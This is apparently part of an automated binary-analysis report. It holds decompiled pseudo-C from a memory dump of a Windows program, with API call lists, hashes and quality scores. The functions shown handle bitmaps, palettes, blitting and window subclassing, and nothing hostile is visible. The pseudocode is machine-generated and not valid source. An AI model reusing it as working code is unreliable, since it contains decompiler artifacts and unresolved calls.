                                                                        							_a4 =  &_v174;
                                                                        						}
                                                                        						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                        						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                        						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                        						E00416BB4(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
                                                                        						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                        						_v12 = _v60;
                                                                        					}
                                                                        				} else {
                                                                        					 *((intOrPtr*)( *_v12 + 8))();
                                                                        					_t261 = _v64;
                                                                        					E00402EF0(_t261, 0x28);
                                                                        					_t251 = _t261;
                                                                        					 *(_t251 + 4) = _v72 & 0x0000ffff;
                                                                        					 *(_t251 + 8) = _v70 & 0x0000ffff;
                                                                        					 *((short*)(_t251 + 0xc)) = _v68;
                                                                        					 *((short*)(_t251 + 0xe)) = _v66;
                                                                        					_t330 = _t329 - 0xc;
                                                                        				}
                                                                        				_t255 = _v64;
                                                                        				 *_t255 = _v36;
                                                                        				_v32 = _v28 + _v36;
                                                                        				if( *((short*)(_t255 + 0xc)) != 1) {
                                                                        					E00420A08();
                                                                        				}
                                                                        				if(_v36 == 0x28) {
                                                                        					_t224 =  *(_t255 + 0xe);
                                                                        					if(_t224 == 0x10 || _t224 == 0x20) {
                                                                        						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
                                                                        							E00416B44(_v12, 0xc, _v32);
                                                                        							_v32 = _v32 + 0xc;
                                                                        							_t330 = _t330 - 0xc;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				if( *(_t255 + 0x20) == 0) {
                                                                        					 *(_t255 + 0x20) = E00420C98( *(_t255 + 0xe));
                                                                        				}
                                                                        				_t327 = _v37 & 0x000000ff;
                                                                        				_t267 =  *(_t255 + 0x20) * 0;
                                                                        				E00416B44(_v12,  *(_t255 + 0x20) * 0, _v32);
                                                                        				_t331 = _t330 -  *(_t255 + 0x20) * 0;
                                                                        				if( *(_t255 + 0x14) == 0) {
                                                                        					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
                                                                        					_t218 = E00420CB8( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
                                                                        					asm("cdq");
                                                                        					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                                                        					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                                                        				}
                                                                        				_t160 =  *(_t255 + 0x14);
                                                                        				if(_t331 > _t160) {
                                                                        					_t331 = _t160;
                                                                        				}
                                                                        				if(_v37 != 0) {
                                                                        					E00420F60(_v32);
                                                                        				}
                                                                        				_v16 = E00420B28(GetDC(0));
                                                                        				_push(_t333);
                                                                        				_push(0x425327);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t335;
                                                                        				_t164 =  *((intOrPtr*)(_v64 + 0x10));
                                                                        				if(_t164 == 0 || _t164 == 3) {
                                                                        					if( *0x47a514 == 0) {
                                                                        						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
                                                                        						if(_v44 == 0 || _v24 == 0) {
                                                                        							if(GetLastError() != 0) {
                                                                        								E0040B330(_t255, _t267, _t327, _t331);
                                                                        							} else {
                                                                        								E00420A08();
                                                                        							}
                                                                        						}
                                                                        						_push(_t333);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t335;
                                                                        						E00416B44(_v12, _t331, _v24);
                                                                        						_pop(_t299);
                                                                        						 *[fs:eax] = _t299;
                                                                        						_t300 = 0x4252f6;
                                                                        						 *[fs:eax] = _t300;
                                                                        						_push(E0042532E);
                                                                        						return ReleaseDC(0, _v16);
                                                                        					} else {
                                                                        						goto L27;
                                                                        					}
                                                                        				} else {
                                                                        					L27:
                                                                        					_v20 = 0;
                                                                        					_v24 = E00402754(_t331);
                                                                        					_push(_t333);
                                                                        					_push(0x42528f);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t335;
                                                                        					_t273 = _t331;
                                                                        					E00416B44(_v12, _t331, _v24);
                                                                        					_v20 = E00420B28(CreateCompatibleDC(_v16));
                                                                        					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
                                                                        					_v56 = 0;
                                                                        					_t193 =  *(_v64 + 0x20);
                                                                        					if(_t193 > 0) {
                                                                        						_t273 = _t193;
                                                                        						_v52 = E00421218(0, _t193);
                                                                        						_v56 = SelectPalette(_v20, _v52, 0);
                                                                        						RealizePalette(_v20);
                                                                        					}
                                                                        					_push(_t333);
                                                                        					_push(0x425263);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t335;
                                                                        					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
                                                                        					if(_v44 == 0) {
                                                                        						if(GetLastError() != 0) {
                                                                        							E0040B330(_t255, _t273, _t327, _t331);
                                                                        						} else {
                                                                        							E00420A08();
                                                                        						}
                                                                        					}
                                                                        					_pop(_t305);
                                                                        					 *[fs:eax] = _t305;
                                                                        					_push(E0042526A);
                                                                        					if(_v56 != 0) {
                                                                        						SelectPalette(_v20, _v56, 0xffffffff);
                                                                        					}
                                                                        					return DeleteObject(SelectObject(_v20, _v48));
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00425126
                                                                        • CreateCompatibleDC.GDI32(00000001), ref: 0042518B
                                                                        • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004251A0
                                                                        • SelectObject.GDI32(?,00000000), ref: 004251AA
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 004251DA
                                                                        • RealizePalette.GDI32(?), ref: 004251E6
                                                                        • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042520A
                                                                        • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00425218
                                                                        • SelectPalette.GDI32(?,00000000,000000FF), ref: 0042524A
                                                                        • SelectObject.GDI32(?,?), ref: 00425257
                                                                        • DeleteObject.GDI32(00000000), ref: 0042525D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                        • String ID: ($BM$x#A
                                                                        • API String ID: 2831685396-1550879612
                                                                        • Opcode ID: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction ID: 3b266c622e7d5c61ee199f7101d8b2b068e3375d9a97a10e13efc2d829a2294f
                                                                        • Opcode Fuzzy Hash: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction Fuzzy Hash: 6FD14C70B002189FDF04DFA9D885BAEBBF5EF49304F51846AE905EB395D7389840CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E0046745C(intOrPtr __eax, char __edx) {
                                                                        				intOrPtr _v8;
                                                                        				char _v9;
                                                                        				intOrPtr* _v16;
                                                                        				intOrPtr* _v20;
                                                                        				intOrPtr* _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v44;
                                                                        				char _v60;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				signed int _t170;
                                                                        				signed int _t176;
                                                                        				void* _t209;
                                                                        				void* _t213;
                                                                        				intOrPtr _t218;
                                                                        				intOrPtr _t241;
                                                                        				void* _t254;
                                                                        				struct HDC__* _t273;
                                                                        				struct HDC__* _t287;
                                                                        				void* _t327;
                                                                        				void* _t348;
                                                                        				void* _t365;
                                                                        				void* _t372;
                                                                        				intOrPtr _t387;
                                                                        				intOrPtr _t393;
                                                                        				struct HDC__* _t397;
                                                                        				struct HDC__* _t398;
                                                                        				struct HDC__* _t399;
                                                                        				void* _t426;
                                                                        				void* _t427;
                                                                        				void* _t428;
                                                                        				intOrPtr _t452;
                                                                        				intOrPtr _t469;
                                                                        				void* _t483;
                                                                        				int _t491;
                                                                        				int _t496;
                                                                        				void* _t498;
                                                                        				void* _t500;
                                                                        				intOrPtr _t501;
                                                                        				void* _t511;
                                                                        
                                                                        				_t498 = _t500;
                                                                        				_t501 = _t500 + 0xffffffc8;
                                                                        				_v9 = __edx;
                                                                        				_v8 = __eax;
                                                                        				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
                                                                        					_v9 = 0;
                                                                        				}
                                                                        				_t393 =  *((intOrPtr*)(_v8 + 0xc));
                                                                        				if(_t393 != 0xffffffff) {
                                                                        					L24:
                                                                        					return _t393;
                                                                        				} else {
                                                                        					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                        					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
                                                                        						goto L24;
                                                                        					} else {
                                                                        						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                        						asm("cdq");
                                                                        						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
                                                                        						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
                                                                        						if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                        							_t508 =  *0x47ac64;
                                                                        							if( *0x47ac64 == 0) {
                                                                        								 *0x47ac64 = E00467150(1);
                                                                        							}
                                                                        							_t387 =  *0x47ac64; // 0x0
                                                                        							 *((intOrPtr*)(_v8 + 8)) = E004671C4(_t387, _t496, _t491);
                                                                        						}
                                                                        						_v16 = E004242CC(1);
                                                                        						 *[fs:eax] = _t501;
                                                                        						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x467a0b, _t498);
                                                                        						 *((intOrPtr*)( *_v16 + 0x34))();
                                                                        						E00412BCC(_t491, 0,  &_v44, _t496);
                                                                        						E0041FC50( *((intOrPtr*)(E00424894(_v16) + 0x14)), _t491, 0x8000000f, _t491, _t498, _t508);
                                                                        						E0042405C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
                                                                        						 *((intOrPtr*)( *_v16 + 0x38))();
                                                                        						if(_v9 >=  *(_v8 + 0x20)) {
                                                                        						}
                                                                        						E00412BCC(1 * _t491, 0,  &_v60, _t496);
                                                                        						_t209 = _v9 - 1;
                                                                        						_t511 = _t209;
                                                                        						if(_t511 < 0) {
                                                                        							L14:
                                                                        							_push( &_v60);
                                                                        							_t213 = E00424894( *((intOrPtr*)(_v8 + 4)));
                                                                        							E00420180(E00424894(_v16),  &_v44, _t512, _t213);
                                                                        							_t218 =  *((intOrPtr*)(_v8 + 4));
                                                                        							_t513 =  *((char*)(_t218 + 0x38)) - 1;
                                                                        							if( *((char*)(_t218 + 0x38)) != 1) {
                                                                        								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
                                                                        							}
                                                                        							goto L23;
                                                                        						} else {
                                                                        							if(_t511 == 0) {
                                                                        								_v24 = 0;
                                                                        								_v20 = 0;
                                                                        								 *[fs:eax] = _t501;
                                                                        								_v24 = E004242CC(1);
                                                                        								_v20 = E004242CC(1);
                                                                        								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4679cf, _t498);
                                                                        								 *((intOrPtr*)( *_v20 + 0x6c))();
                                                                        								_t241 = _v8;
                                                                        								__eflags =  *((char*)(_t241 + 0x20)) - 1;
                                                                        								if( *((char*)(_t241 + 0x20)) <= 1) {
                                                                        									 *((intOrPtr*)( *_v24 + 8))();
                                                                        									 *((intOrPtr*)( *_v24 + 0x6c))();
                                                                        									E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
                                                                        									_t420 =  *_v24;
                                                                        									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                        									_t254 = E00424950(_v24);
                                                                        									__eflags = _t254;
                                                                        									if(_t254 != 0) {
                                                                        										E0041F464( *((intOrPtr*)(E00424894(_v24) + 0xc)), 0xffffff);
                                                                        										__eflags = 0;
                                                                        										E004256E4(_v24, 0);
                                                                        										E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
                                                                        									}
                                                                        									E004256E4(_v24, 1);
                                                                        									_t396 = E00424894(_v16);
                                                                        									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x8000000f, _t491, _t498, __eflags);
                                                                        									E004202E8(_t258,  &_v44);
                                                                        									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x80000014, _t491, _t498, __eflags);
                                                                        									SetTextColor(E00420730(_t396), 0);
                                                                        									SetBkColor(E00420730(_t396), 0xffffff);
                                                                        									_t273 = E00420730(E00424894(_v24));
                                                                        									BitBlt(E00420730(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
                                                                        									E0041FC50( *((intOrPtr*)(_t396 + 0x14)), _t420, 0x80000010, _t491, _t498, __eflags);
                                                                        									SetTextColor(E00420730(_t396), 0);
                                                                        									SetBkColor(E00420730(_t396), 0xffffff);
                                                                        									_t287 = E00420730(E00424894(_v24));
                                                                        									BitBlt(E00420730(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
                                                                        								} else {
                                                                        									_v28 = E00424894(_v16);
                                                                        									E00424894(_v20);
                                                                        									E00420180(_v28,  &_v44, __eflags,  &_v60);
                                                                        									E004256E4(_v24, 1);
                                                                        									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                        									 *((intOrPtr*)( *_v24 + 0x34))();
                                                                        									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
                                                                        									_push( &_v60);
                                                                        									_push(E00424894(_v20));
                                                                        									_t327 = E00424894(_v24);
                                                                        									_pop(_t426);
                                                                        									E00420180(_t327,  &_v44, __eflags);
                                                                        									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t426, 0x80000014, _t491, _t498, __eflags);
                                                                        									_t397 = E00420730(_v28);
                                                                        									SetTextColor(_t397, 0);
                                                                        									SetBkColor(_t397, 0xffffff);
                                                                        									BitBlt(_t397, 0, 0, _t491, _t496, E00420730(E00424894(_v24)), 0, 0, 0xe20746);
                                                                        									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
                                                                        									_push( &_v60);
                                                                        									_push(E00424894(_v20));
                                                                        									_t348 = E00424894(_v24);
                                                                        									_pop(_t427);
                                                                        									E00420180(_t348,  &_v44, __eflags);
                                                                        									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t427, 0x80000010, _t491, _t498, __eflags);
                                                                        									_t398 = E00420730(_v28);
                                                                        									SetTextColor(_t398, 0);
                                                                        									SetBkColor(_t398, 0xffffff);
                                                                        									BitBlt(_t398, 0, 0, _t491, _t496, E00420730(E00424894(_v24)), 0, 0, 0xe20746);
                                                                        									_push(E0041EFA4( *((intOrPtr*)(_v8 + 0x1c))));
                                                                        									_t365 = E00424894(_v20);
                                                                        									_pop(_t483);
                                                                        									E0041FC50( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
                                                                        									_push( &_v60);
                                                                        									_push(E00424894(_v20));
                                                                        									_t372 = E00424894(_v24);
                                                                        									_pop(_t428);
                                                                        									E00420180(_t372,  &_v44, __eflags);
                                                                        									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t428, 0x8000000f, _t491, _t498, __eflags);
                                                                        									_t399 = E00420730(_v28);
                                                                        									SetTextColor(_t399, 0);
                                                                        									SetBkColor(_t399, 0xffffff);
                                                                        									BitBlt(_t399, 0, 0, _t491, _t496, E00420730(E00424894(_v24)), 0, 0, 0xe20746);
                                                                        								}
                                                                        								__eflags = 0;
                                                                        								_pop(_t469);
                                                                        								 *[fs:eax] = _t469;
                                                                        								_push(0x4679d6);
                                                                        								E004035DC(_v20);
                                                                        								return E004035DC(_v24);
                                                                        							} else {
                                                                        								_t512 = _t209 - 0xffffffffffffffff;
                                                                        								if(_t209 - 0xffffffffffffffff < 0) {
                                                                        									goto L14;
                                                                        								}
                                                                        								L23:
                                                                        								_pop(_t452);
                                                                        								 *[fs:eax] = _t452;
                                                                        								_push(0x467a12);
                                                                        								return E004035DC(_v16);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}












































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DA
                                                                        • API String ID: 0-2080325668
                                                                        • Opcode ID: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction ID: 1aaab0506d005b2b6a366c37f16578aea9443783ae75c99a7e7321e86aad177a
                                                                        • Opcode Fuzzy Hash: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction Fuzzy Hash: FC025074B04115AFD700EBA9D986E9EB7F5EF48318F10456AF404EB392DA38ED01CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E004787FC(int __eax, void* __eflags) {
                                                                        				int _v8;
                                                                        				char* _t87;
                                                                        				int _t89;
                                                                        				long _t92;
                                                                        				int _t117;
                                                                        				struct HWND__* _t146;
                                                                        				void* _t149;
                                                                        				void* _t150;
                                                                        				struct HWND__* _t151;
                                                                        				intOrPtr _t162;
                                                                        				struct HWND__* _t168;
                                                                        				void* _t170;
                                                                        				struct HWND__* _t171;
                                                                        				struct HWND__* _t172;
                                                                        				intOrPtr _t174;
                                                                        				intOrPtr _t176;
                                                                        
                                                                        				_t174 = _t176;
                                                                        				_v8 = __eax;
                                                                        				E0042D3EC(_v8);
                                                                        				_t146 = GetWindow(E0043CC2C(_v8), 5);
                                                                        				 *(_v8 + 0x248) = _t146;
                                                                        				_t168 = _t146;
                                                                        				 *(_v8 + 0x268) = _t168;
                                                                        				 *((intOrPtr*)(_v8 + 0x26c)) = GetWindowLongA(_t168, 0xfffffffc);
                                                                        				SetWindowLongA( *(_v8 + 0x268), 0xfffffffc,  *(_v8 + 0x270));
                                                                        				if( *((intOrPtr*)(_v8 + 0x281)) - 2 < 0) {
                                                                        					_t151 = GetWindow(GetWindow(E0043CC2C(_v8), 5), 5);
                                                                        					if(_t151 != 0) {
                                                                        						if( *((char*)(_v8 + 0x281)) == 1) {
                                                                        							_t172 = _t151;
                                                                        							 *(_v8 + 0x244) = _t172;
                                                                        							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t172, 0xfffffffc);
                                                                        							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
                                                                        							_t151 = GetWindow(_t151, 2);
                                                                        						}
                                                                        						_t171 = _t151;
                                                                        						 *(_v8 + 0x240) = _t171;
                                                                        						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t171, 0xfffffffc);
                                                                        						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
                                                                        					}
                                                                        				}
                                                                        				_t87 =  *0x495a04; // 0x496b70
                                                                        				if( *_t87 != 0 &&  *(_v8 + 0x240) != 0) {
                                                                        					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_v8 + 0x27c)) == 0) {
                                                                        					_t89 = _v8;
                                                                        					if( *((intOrPtr*)(_t89 + 0x278)) != 0) {
                                                                        						_t92 = E004436E8( *((intOrPtr*)(_v8 + 0x278)));
                                                                        						_t89 = PostMessageA(E0043CC2C(_v8), 0x402, 0, _t92);
                                                                        					}
                                                                        					return _t89;
                                                                        				} else {
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x20))();
                                                                        					 *((char*)(_v8 + 0x280)) = 1;
                                                                        					 *[fs:eax] = _t176;
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 8))( *[fs:eax], 0x4789fe, _t174);
                                                                        					_t149 = E0041521C( *((intOrPtr*)(_v8 + 0x284))) - 1;
                                                                        					if(_t149 >= 0) {
                                                                        						_t150 = _t149 + 1;
                                                                        						_t170 = 0;
                                                                        						do {
                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x2c))();
                                                                        							_t170 = _t170 + 1;
                                                                        							_t150 = _t150 - 1;
                                                                        						} while (_t150 != 0);
                                                                        					}
                                                                        					E0040BAFC(_v8 + 0x27c);
                                                                        					E004366A0(_v8);
                                                                        					_pop(_t162);
                                                                        					 *[fs:eax] = _t162;
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x24))(0x478a05);
                                                                        					_t117 = _v8;
                                                                        					 *((char*)(_t117 + 0x280)) = 0;
                                                                        					return _t117;
                                                                        				}
                                                                        			}



















                                                                        0x004789fd

                                                                        APIs
                                                                          • Part of subcall function 0042D3EC: SendMessageA.USER32 ref: 0042D40C
                                                                        • GetWindow.USER32(00000000,00000005), ref: 00478818
                                                                        • GetWindowLongA.USER32 ref: 00478836
                                                                        • SetWindowLongA.USER32 ref: 0047885A
                                                                        • GetWindow.USER32(00000000,00000005), ref: 0047887D
                                                                        • GetWindow.USER32(00000000,00000000), ref: 00478883
                                                                        • GetWindowLongA.USER32 ref: 004788AC
                                                                        • SetWindowLongA.USER32 ref: 004788D0
                                                                        • GetWindow.USER32(00000000,00000002), ref: 004788D8
                                                                        • GetWindowLongA.USER32 ref: 004788ED
                                                                        • SetWindowLongA.USER32 ref: 00478911
                                                                        • SendMessageA.USER32 ref: 0047893F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Long$MessageSend
                                                                        • String ID: pkI
                                                                        • API String ID: 1593136606-582613530
                                                                        • Opcode ID: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction ID: c93d556c733353f28b80892d9748ad900ab6ec26727c7c5ce3df2aa97b74d364
                                                                        • Opcode Fuzzy Hash: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction Fuzzy Hash: CB61F074A04105EFDB10EB99C989E9D77F4EB09314F2541F9F508AB3A2CB74AE40DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E004245C4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				struct HPALETTE__* _v12;
                                                                        				char _v13;
                                                                        				struct tagPOINT _v21;
                                                                        				struct HDC__* _v28;
                                                                        				void* _v32;
                                                                        				struct HPALETTE__* _t74;
                                                                        				signed int _t80;
                                                                        				signed int _t81;
                                                                        				char _t82;
                                                                        				void* _t89;
                                                                        				void* _t135;
                                                                        				intOrPtr* _t165;
                                                                        				intOrPtr _t173;
                                                                        				signed int _t174;
                                                                        				intOrPtr _t177;
                                                                        				intOrPtr _t179;
                                                                        				intOrPtr _t181;
                                                                        				int* _t185;
                                                                        				intOrPtr _t187;
                                                                        				void* _t189;
                                                                        				void* _t190;
                                                                        				intOrPtr _t191;
                                                                        
                                                                        				_t166 = __ecx;
                                                                        				_t189 = _t190;
                                                                        				_t191 = _t190 + 0xffffffe4;
                                                                        				_t185 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t165 = __eax;
                                                                        				_t187 =  *((intOrPtr*)(__eax + 0x28));
                                                                        				_t173 =  *0x424810; // 0xf
                                                                        				E00420804(_v8, __ecx, _t173);
                                                                        				E00424C34(_t165);
                                                                        				_v12 = 0;
                                                                        				_v13 = 0;
                                                                        				_t74 =  *(_t187 + 0x10);
                                                                        				if(_t74 != 0) {
                                                                        					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
                                                                        					RealizePalette( *(_v8 + 4));
                                                                        					_v13 = 1;
                                                                        				}
                                                                        				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
                                                                        				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
                                                                        				_pop(_t174);
                                                                        				_t81 = _t174 * _t80;
                                                                        				if(_t81 > 8) {
                                                                        					L4:
                                                                        					_t82 = 0;
                                                                        				} else {
                                                                        					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
                                                                        					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
                                                                        						_t82 = 1;
                                                                        					} else {
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				if(_t82 == 0) {
                                                                        					if(E00424950(_t165) == 0) {
                                                                        						SetStretchBltMode(E00420730(_v8), 3);
                                                                        					}
                                                                        				} else {
                                                                        					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                        					SetStretchBltMode( *(_v8 + 4), 4);
                                                                        					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                        				}
                                                                        				_push(_t189);
                                                                        				_push(0x424801);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t191;
                                                                        				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
                                                                        					E00424BD4(_t165, _t166);
                                                                        				}
                                                                        				_t89 = E00424894(_t165);
                                                                        				_t177 =  *0x424810; // 0xf
                                                                        				E00420804(_t89, _t166, _t177);
                                                                        				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
                                                                        					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424894(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
                                                                        					_pop(_t179);
                                                                        					 *[fs:eax] = _t179;
                                                                        					_push(E00424808);
                                                                        					if(_v13 != 0) {
                                                                        						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
                                                                        					}
                                                                        					return 0;
                                                                        				} else {
                                                                        					_v32 = 0;
                                                                        					_v28 = 0;
                                                                        					_push(_t189);
                                                                        					_push(0x424796);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t191;
                                                                        					_v28 = E00420B28(CreateCompatibleDC(0));
                                                                        					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
                                                                        					E00420CCC( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424894(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
                                                                        					_t135 = 0;
                                                                        					_pop(_t181);
                                                                        					 *[fs:eax] = _t181;
                                                                        					_push(0x4247db);
                                                                        					if(_v32 != 0) {
                                                                        						_t135 = SelectObject(_v28, _v32);
                                                                        					}
                                                                        					if(_v28 != 0) {
                                                                        						return DeleteDC(_v28);
                                                                        					}
                                                                        					return _t135;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00424C34: GetDC.USER32(00000000), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
